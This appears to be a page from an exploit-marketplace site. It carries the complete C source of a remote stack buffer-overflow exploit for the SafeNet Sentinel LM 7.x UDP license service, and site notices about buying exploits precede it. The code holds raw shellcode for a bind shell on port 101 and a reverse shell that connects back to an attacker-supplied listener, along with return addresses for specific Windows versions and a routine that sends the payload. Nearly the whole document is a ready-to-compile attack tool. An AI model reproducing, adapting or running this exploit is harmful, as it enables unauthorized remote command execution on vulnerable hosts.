0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit
================================================================== Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit ================================================================== /* SentinelLM, UDP License Service Stack Overflow Homepage: safenet-inc.com Affected version: 7.* Patched version: 8.0 Link: safenet-inc.com/products/sentinel/lm.asp Date: 09 March 2005 Advisory: securitytracker.com/alerts/2005/Mar/1013385.html Application Risk: High Internet Risk: Medium (UDP) Dicovery Credits: Dennis Rand (CIRT.DK) Exploit Credits : class101 Hole History: 07-3-2005: BOF flaw published by Dennis Rand of CIRT.DK 09-3-2005: hat-squad's exploit done 13-3-2005: hat-squad's exploit released Notes: -the exploit targets 5093/UDP -no bad chars detected -Unlike it is said in the CIRT.DK advisory, you shouldn't submit 3000bytes of data, but indeed, the overflow is occuring at around 3900 bytes. SentinelLM will proceed the first 1035bytes of your buffer and will repeat those until the override of the stack. Conclusion , you have to be good with maths (nor to control our friend olly & calc :>) to overwrite the right place in your buffer[1035] to finally reach eip when your buffer "autogrows" at around buffer[3940]. -sending the buffer twice because the 1st attempt can fail sometimes. -using a nice popopret outside of a loaded module for SP2and2k3 targets. this offset has been tested on SP2 and 2003 ENGLISH (maybe langage-dependent dunno..) -to note so that target3 (SP2/2k3) can work sometimes as target2 (SP1a/1/0) but it is not stable this is why I use one of the two I have posted at fulldisclosure (0x71ABE325/SP1a/1/0). This last is stable for the 3 sp (ENGLISH!). Compilation: 101_SentLM.cpp ......... Win32 (MSVC,cygwin) 101_SentLM.c ........... Linux (FreeBSD,etc..) *Another fine working code, published as a patch warning or for an EXPERIMENTAL use!* Greet: *GUILLERMITO* "the terrorist...sigh..:(" NIMA MAJIDI BEHRANG FOULADI PEJMAN HAMID HAT-SQUAD.COM metasploit.com A^C^E of addict3d.org str0ke of milw0rm.com and my homy CLASS101.ORG :> */ #include <stdio.h> #include <string.h> #include <time.h> #ifdef WIN32 #include "winsock2.h" #pragma comment(lib, "ws2_32") #else #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netdb.h> #include <arpa/inet.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #endif char scode1[]= "\x33\xC9\x83\xE9" "\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB" "\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95" "\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1" "\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B" "\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E" "\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76" "\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A" "\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64" "\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58" "\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C" "\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95" "\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F" "\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B" "\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02" "\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D" "\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07" "\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99" "\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18" "\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B" "\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95" "\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02" "\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A"; char scode2[]= /*original vlad902's reverse shellcode from metasploit.com NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20" original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/ "\xFC\x6A\xEB\x52" /*modded adjusting jump*/ "\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05" "\x78\x01\xEF" "\x83\xC7\x01" /*modded, adding 1 to edi*/ "\x8B\x4F\x17" /*modded, adjusting ecx*/ "\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/ "\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0" "\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3" "\x8B\x5F\x23" /*modded, adjusting ebx*/ "\x01\xEB\x66\x8B\x0C\x4B" "\x8B\x5F\x1B" /*modded, adjusting ebx*/ "\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40" "\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E" "\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32" "\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66" "\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF" "\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00" "\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF" "\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50" "\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD" "\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3" "\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51" "\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37" "\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF" "\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0"; char payload[1100]; char sip[3];char spo[1]; char pad[]="\xEB\x08\x90\x90"; char pad2[]="\xE9\xC2\xFC\xFF\xFF"; char ebx2k[]="\x08\xB0\x01\x78"; char ebxp[]="\x25\xE3\xAB\x71"; /*popopret inside of a loaded module for SP0-1-1a*/ char ebxsp2k3[]="\xE1\x1B\xFA\x7F"; /*popopret outside of a loaded module for SP2 and 2003*/ /*some tests*/ char fix[]="\x76\x6C\x6D\x73"; char fix2[]="\x72\x76\x72\x2E"; #ifdef WIN32 WSADATA wsadata; #endif void ver(); void usage(char* us); int main(int argc,char *argv[]) { ver(); int co, sw=0, check1, check2; unsigned long gip; unsigned short gport; char *target, *os; if (argc>6||argc<3||atoi(argv[1])>4||atoi(argv[1])<1){usage(argv[0]);return -1;} if (argc==5){usage(argv[0]);return -1;} if (strlen(argv[2])<7){usage(argv[0]);return -1;} if (argc==6) { if (strlen(argv[4])<7){usage(argv[0]);return -1;} } #ifndef WIN32 if (argc==6) { gip=inet_addr(argv[4])^(long)0x00000000; gport=htons(atoi(argv[5]))^(short)0x0000; memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2); check1=strlen(&sip[0]);check2=strlen(&spo[0]); if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){ printf("[+] error, the IP has a null byte in hex...\n");return -1;} if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;} } #define Sleep sleep #define SOCKET int #define closesocket(s) close(s) #else if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;} if (argc==6) { gip=inet_addr(argv[4])^(ULONG)0x00000000; gport=htons(atoi(argv[5]))^(USHORT)0x0000; memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2); check1=strlen(&sip[0]);check2=strlen(&spo[0]); if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){ printf("[+] error, the IP has a null byte in hex...\n");return -1;} if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;} } #endif int ip=htonl(inet_addr(argv[2])), port; if (argc==4||argc==6){port=atoi(argv[3]);} else port=5093; SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server; s=socket(AF_INET,SOCK_DGRAM,0); if (s==-1){printf("[+] socket() error\n");return -1;} if (atoi(argv[1]) == 1){target=ebx2k;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro English";} if (atoi(argv[1]) == 2){target=ebxp;os="WinXP SP0 Pro English\n[+] WinXP SP1 Pro English\n[+] WinXP SP1a Pro English";} if (atoi(argv[1]) == 3){target=ebxsp2k3;os="WinXP SP2 Pro English";} if (atoi(argv[1]) == 4){target=ebxsp2k3;os="Win2003 SP0 Server English";} server.sin_family=AF_INET; server.sin_addr.s_addr=htonl(ip); server.sin_port=htons(port); memset(payload,0x90,1100); if (atoi(argv[1]) == 4) { memcpy(payload+836,target,4); memcpy(payload+832,pad,4); memcpy(payload+845,pad2,5); } else { memcpy(payload+840,target,4); memcpy(payload+836,pad,4); memcpy(payload+849,pad2,5); } memcpy(payload+12,fix,4); memcpy(payload+16,fix2,4); if (argc==6) { memcpy(&scode2[167], &gip, 4); memcpy(&scode2[173], &gport, 2); memcpy(payload+33,scode2,strlen(scode2)); } else memcpy(payload+33,scode1,strlen(scode1)); printf("[+] target(s): %s\n",os); printf("[+] sending datas to the udp port...\n"); co = sendto(s,payload,sizeof(payload),0,(struct sockaddr *)&server,sizeof(server)); #ifdef WIN32 Sleep(1000); #else Sleep(1); #endif co = sendto(s,payload,sizeof(payload),0,(struct sockaddr *)&server,sizeof(server)); #ifdef WIN32 Sleep(1000); #else Sleep(1); #endif timeout.tv_sec=10;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask); sw = select((s+1),&mask,NULL,NULL,&timeout); if(sw) { printf("[+] sending error, the server prolly rebooted.\n"); closesocket(s); return -1; } else { printf("[+] size of payload: %d\n",strlen(payload)); if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");} else printf("[+] payload sent, use telnet victimIP:101 to get a shell\n"); closesocket(s); return 0; } return 0; } void usage(char* us) { printf(" \n"); printf(" [+] . 101_SentLM.exe Target VulnIP (bind mode) \n"); printf(" [+] . 101_SentLM.exe Target VulnIP VulnPORT (bind mode) \n"); printf(" [+] . 101_SentLM.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n"); printf("TARGETS: \n"); printf(" [+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n"); printf(" [+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n"); printf(" [+] 2. WinXP SP0 Pro. English (*) - v5.1.2600 \n"); printf(" [+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 \n"); printf(" [+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 \n"); printf(" [+] 3. WinXP SP2 Pro. English (*) - v5.1.2600.2180 \n"); printf(" [+] 4. Win2k3 SP0 Server English (*) - v5.2.3790 \n"); printf("NOTE: \n"); printf(" The exploit bind a cmdshell port 101 or \n"); printf(" reverse a cmdshell on your listener. \n"); printf(" A wildcard (*) mean tested working, else, supposed working. \n"); printf(" A symbol (-) mean all. \n"); printf(" Compilation msvc6, cygwin, Linux. \n"); printf(" \n"); return; } void ver() { printf(" \n"); printf(" ===================================================[v0.1]====\n"); printf(" =====================SafeNet Sentinel LM=====================\n"); printf(" ===============Remote Buffer Overflow Exploit================\n"); printf(" ======coded by class101=============[Hat-Squad.com]==========\n"); printf(" =====================================[class101.org]==========\n"); printf(" \n"); } # 0day.today [2024-12-24] #